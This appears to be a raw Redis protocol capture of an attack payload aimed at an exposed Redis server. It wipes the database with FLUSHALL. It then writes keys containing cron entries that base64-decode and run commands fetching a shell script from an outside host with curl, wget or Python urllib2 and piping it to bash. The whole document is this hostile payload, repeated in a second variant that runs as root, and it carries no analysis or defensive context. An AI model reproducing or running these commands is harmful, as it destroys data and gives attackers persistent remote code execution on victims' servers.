*2
$6
SELECT
$1
0
*1
$8
flushall
*3
$3
set
$7
backup1
$91



*/2 * * * * echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$102



*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$90



*/4 * * * * echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


*1
$8
flushall
*3
$3
set
$7
backup1
$96



*/2 * * * * root echo Y2QxIGh0dHA6Ly9zLm5hLWNzLmNvbS9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 


*3
$3
set
$7
backup2
$107



*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9iLnNoCg==|base64 -d|bash|bash


*3
$3
set
$7
backup3
$95



*/4 * * * * root echo Y3VybCBodHRwOi8vcy5uYS1jcy5jb20vYjJmNjI4L2Iuc2gK|base64 -d|bash|bash


*3
$3
set
$7
backup4
$123



@hourly  python -c "import urllib2; print urllib2.urlopen('http://\\s.n\a-c\s.c\om/t.sh').read()" >.1;chmod +x .1;./.1


